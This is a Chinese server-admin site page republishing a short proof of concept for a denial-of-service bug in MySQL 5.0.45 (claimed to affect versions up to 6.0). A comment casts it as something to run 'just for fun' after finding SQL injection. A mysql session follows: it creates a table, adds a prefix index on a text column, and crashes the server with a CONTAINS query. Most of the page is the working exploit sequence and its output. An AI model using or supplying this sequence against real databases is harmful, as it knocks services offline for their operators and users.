服务器之家

服务器之家 > 正文

mysql 5.0.45 (修改)拒绝服务漏洞

时间:2019-11-08 15:22     来源/作者:mysql教程网

mysql 5.0.45 (修改)拒绝服务漏洞 
/* 
* MySQL <=6.0 possibly affected 
* Kristian Erik Hermansen 
* Credit: Joe Gallo 
* You must have Alter permissions to exploit this bug! 
* Scenario: You found SQL injection, but you want to punch backend server 
* in the nuts just for fun. Start with the Alter TABLE statement on 
* a table and field you know to exist. The first two SQL statements are 
* simply to demostrate reproducibility... 
*/ 

<snip> 
mysql> Create TABLE `test` ( 
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, 
`foo` text NOT NULL 
) ENGINE=InnoDB DEFAULT CHARSET=latin1; 
Query OK, 0 rows affected 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 
Empty set 

mysql> Alter TABLE test ADD INDEX (foo(100)); 
Query OK, 0 rows affected 
Records: 0 Duplicates: 0 Warnings: 0 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 
ERROR 2013 : Lost connection to MySQL server during query 
</snip>

相关文章

热门资讯

玄元剑仙肉身有什么用 玄元剑仙肉身境界等级划分
玄元剑仙肉身有什么用 玄元剑仙肉身境界等级划分 2019-06-21
男生常说24816是什么意思?女生说13579是什么意思?
男生常说24816是什么意思?女生说13579是什么意思? 2019-09-17
华为nova5pro和p30pro哪个好 华为nova5pro和华为p30pro对比详情
华为nova5pro和p30pro哪个好 华为nova5pro和华为p30pro对比详情 2019-06-22
Nginx服务器究竟是怎么执行PHP项目
Nginx服务器究竟是怎么执行PHP项目 2019-05-24
配置IIS网站web服务器的安全策略配置解决方案
配置IIS网站web服务器的安全策略配置解决方案 2019-05-23
返回顶部